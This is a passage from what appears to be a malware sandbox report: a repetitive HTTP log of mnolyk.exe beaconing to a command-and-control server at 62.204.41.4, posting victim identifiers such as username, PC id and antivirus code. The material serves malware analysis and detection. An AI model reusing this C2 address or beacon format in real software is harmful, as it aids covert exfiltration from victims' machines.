                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:21.908354044 CET | 771 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        572 | 192.168.2.5 | 50262 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:22.073796988 CET | 772 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:22.141985893 CET | 772 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        573 | 192.168.2.5 | 50263 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:22.314338923 CET | 773 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:22.379453897 CET | 773 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        574 | 192.168.2.5 | 50264 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:22.564256907 CET | 774 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:22.630848885 CET | 774 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        575 | 192.168.2.5 | 50265 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:22.827156067 CET | 775 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:22.892991066 CET | 775 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        576 | 192.168.2.5 | 50266 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:23.059191942 CET | 776 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:23.127336025 CET | 776 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        577 | 192.168.2.5 | 50267 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:23.304553986 CET | 777 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:23.369493961 CET | 777 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        578 | 192.168.2.5 | 50268 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:23.543087006 CET | 778 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:23.607664108 CET | 778 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        579 | 192.168.2.5 | 50269 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:23.777740955 CET | 779 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:23.841481924 CET | 779 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        58 | 192.168.2.5 | 49748 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:58.336551905 CET | 259 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:58.402678013 CET | 259 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        580 | 192.168.2.5 | 50270 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:24.011353970 CET | 780 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:24.077202082 CET | 780 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        581 | 192.168.2.5 | 50271 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:24.244810104 CET | 781 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:24.308454037 CET | 781 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        582 | 192.168.2.5 | 50272 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:24.480079889 CET | 782 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:24.546220064 CET | 782 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        583 | 192.168.2.5 | 50273 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:24.721440077 CET | 783 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:24.788153887 CET | 783 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        584 | 192.168.2.5 | 50274 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:24.966329098 CET | 784 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:25.033452988 CET | 784 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        585 | 192.168.2.5 | 50275 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:25.216519117 CET | 785 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:25.282788038 CET | 785 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        59 | 192.168.2.5 | 49749 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:58.580579996 CET | 260 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:58.645394087 CET | 260 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        6 | 192.168.2.5 | 49696 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:30.082324028 CET | 206 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:30.151854992 CET | 207 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        60 | 192.168.2.5 | 49750 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:58.814620018 CET | 261 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:58.879216909 CET | 261 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        61 | 192.168.2.5 | 49751 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:59.053793907 CET | 262 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:59.119268894 CET | 262 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
